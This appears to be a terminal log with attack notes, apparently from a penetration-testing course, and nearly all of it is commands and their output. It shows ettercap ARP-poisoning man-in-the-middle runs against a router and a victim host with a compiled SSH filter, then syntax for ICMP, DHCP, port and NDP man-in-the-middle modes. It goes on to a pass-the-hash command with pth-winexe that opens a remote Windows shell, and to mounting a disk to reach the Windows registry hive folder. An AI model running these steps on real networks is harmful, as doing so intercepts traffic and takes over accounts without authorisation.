Writing output to 'ssh.ef' done.
-> Script encoded into 16 instructions.
root@k:/usr/share/ettercap# ls
AUTHORS etter.filter etterfilter.tbl etter.ssl.crt
doc etterfilter.cnt etter.finger.mac lua
ettercap.png etter.filter.examples etter.finger.os ssh.ef
ettercap-small.png etter.filter.kill etterlog.dtd
ettercap.svg etter.filter.pcre etter.mime
etter.fields etter.filter.ssh etter.services
root@k:/usr/share/ettercap# cat ssh.ef
root@k:/usr/share/ettercap# mv ssh.ef /root/
root@k:/usr/share/ettercap# cd
root@k:~# ettercap -Tq -M arp:remote -i eth0 /192.168.1.1// /192.168.1.114// -F ssh.ef
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Listening on:
eth0 -> 08:00:27:DB:B2:AF
192.168.1.110/255.255.255.0
fe80::a00:27ff:fedb:b2af/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 0 EGID 0...
33 plugins
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Scanning for merged targets (2 hosts)...
* |======================================================>| 100.00%
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.1 14:75:90:21:4F:56
GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18
Starting Unified sniffing
Text only Interface activated ...
Hit 'h' for inline help
Man-in-the-middle attacks: other MITM modes
ICMP
- -M icmp:00:11:22:33:44:55/10.0.1   (MAC/IP of the real gateway)
DHCP
- -M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1   (the last address is the DNS server)
Port
- -M port /1.1.1.1/ /1.1.1.2/
NDP
- -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/
Pass the Hash (PTH)
- Cracking passwords costs a great deal of time and computing resources
- Instead, the hash itself is submitted to the server to complete authentication
- NTLM/LM hashes are static and unsalted
- Enterprises commonly install systems by cloning with tools such as Ghost
- pth-winexe -U w7%aad3b435b51404eeaadd3b435b51404ee:ed1bfaeb3063716ab7fe2allfaf126d8 //1.1.1.1 cmd
root@k:~# mount /dev/sha2 /mnt
root@k:~# cd /mnt/Windows/System32/config